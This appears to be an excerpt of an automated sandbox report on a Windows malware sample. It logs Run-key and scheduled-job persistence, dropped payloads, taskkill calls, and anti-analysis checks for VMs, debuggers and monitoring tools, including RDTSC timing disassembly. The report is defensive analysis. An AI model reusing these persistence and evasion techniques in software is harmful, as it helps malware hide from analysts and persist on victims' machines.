Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a6f0d09f38.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a6f0d09f38.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b5da647ae3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b5da647ae3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6e1fbaaba5.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6e1fbaaba5.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8b82d73f70.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8b82d73f70.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: SxQyhJr.exe PID: 7396, type: MEMORYSTR
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F09BA second address: 8F09DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB7D50A5EDDh 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FB7D50A5ED6h 0x00000014 jns 00007FB7D50A5ED6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF9E6 second address: 8EF9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF9EC second address: 8EF9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF9F0 second address: 8EF9F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC35 second address: 8EFC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB7D50A5EE3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC4F second address: 8EFC69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B855h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC69 second address: 8EFC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jns 00007FB7D50A5ED6h 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jp 00007FB7D50A5ED6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC88 second address: 8EFC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFC8E second address: 8EFC94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE09 second address: 8EFE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE15 second address: 8EFE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnp 00007FB7D50A5ED8h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB7D50A5EDEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE36 second address: 8EFE3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE3A second address: 8EFE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE46 second address: 8EFE4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE4A second address: 8EFE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EE3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB7D50A5EDAh 0x00000012 jmp 00007FB7D50A5EE1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EFE80 second address: 8EFE84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F0284 second address: 8F0288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F0288 second address: 8F028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F028E second address: 8F02AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB7D50A5EDCh 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F3E18 second address: 8F3E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F3F73 second address: 8F3F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F3F79 second address: 8F3F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F3F85 second address: 8F3F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F3FED second address: 8F4005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FB7D509B84Ch 0x0000000b jg 00007FB7D509B846h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F4005 second address: 8F400A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F400A second address: 8F400F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F400F second address: 8F408C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FB7D50A5ED8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D2A8Ah] 0x00000028 mov dl, cl 0x0000002a push 00000000h 0x0000002c jmp 00007FB7D50A5EE7h 0x00000031 call 00007FB7D50A5ED9h 0x00000036 push ebx 0x00000037 jl 00007FB7D50A5EDCh 0x0000003d jnp 00007FB7D50A5ED6h 0x00000043 pop ebx 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FB7D50A5EE7h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F408C second address: 8F40A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B850h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F40A0 second address: 8F40C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FB7D50A5EE4h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F40C6 second address: 8F40D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
